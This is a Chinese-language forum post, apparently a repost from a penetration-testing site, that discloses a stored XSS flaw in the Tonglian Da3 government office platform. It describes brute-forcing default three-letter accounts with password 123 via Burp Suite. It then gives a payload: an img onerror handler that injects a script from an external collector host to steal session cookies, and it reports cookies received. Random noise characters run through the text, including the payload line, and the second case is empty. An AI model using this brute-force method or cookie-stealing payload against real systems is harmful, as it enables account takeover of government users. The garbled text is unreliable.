m( b8 M# V7 A& O, }7 M& S* N 同联Da3协同办公平台后台通用储存型xss漏洞
. i7 e( p0 Z+ Q# u2 n5 V, p$ g! l H5 t7 r% J 平台简介:0 X/ x! s" Z5 q1 l1 s
% L* q6 I* y2 x1 s, ]
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
4 |( k2 H+ Y5 q/ D3 |# F5 o# z
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% d2 C+ I, a% f0 E: w5 o$ v2 Y
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
, A! f- s7 V) X1 l% W7 y
8 R1 s& i! R" I+ k" H& n http://1.1.1.1:7197/cap-aco/#(案例2-)
P7 [1 k- R! ] http://www.XXOO.com (案例1-官网网站)
- t7 b+ `7 q, f" I! k& V, N1 k 漏洞详情:& R, u/ F- b& Z K$ [/ U' s0 v& ]
- g( a o$ g: P& I P案例一、" c( I7 u( l% G- d8 z3 z
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试1 R6 C( u9 L& p7 l, m+ F7 L
' g, K. f+ g; Q! s 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
1 X, J% S; u5 u" T9 {+ G- i5 j
' S9 ]% g# v& [2 c" Z status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
+ S. |- A2 e" E' ? ) H* o4 K5 {# T; t& u5 q " [! z9 I: c0 M/ e6 u7 v; u3 i7 p( o+ ?/ j8 ]. j: a% z 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
9 m9 x6 Z* {9 {8 F+ K" w; _8 u8 {! n: K8 V0 k: c
<img src=x" q2 J6 _; r+ ~: b onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: ) U- }8 S. e" W/ {
8 O& Z- a8 P2 V: g+ m' G7 ?3 D/ R' N- h/ s 然后发送,接收cookie如图: 4 q8 B, r/ C& y: }9 i0 o" i
8 @& u5 G. j' L0 q. n: m9 N! y; P5 o7 ~9 m& u V4 ]+ D
* S. k6 i" B; ~: f1 f
4 g, r4 l4 Q1 [, d
! A( {' _$ P' Q F
7 T' s2 c# U1 B) C1 \& B, z
- R" U* X/ c* [6 J0 l2 l) F
案例2、 7 F: a' R. R' C4 `, l7 e8 j
; y& c9 n! q; U- { - A0 O; w+ E2 ^' J; W- x7 U L$ x- W& `" z" D# Q0 ^/ G
5 E( M" N" U( M% ~ V8 F: t0 k, W
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |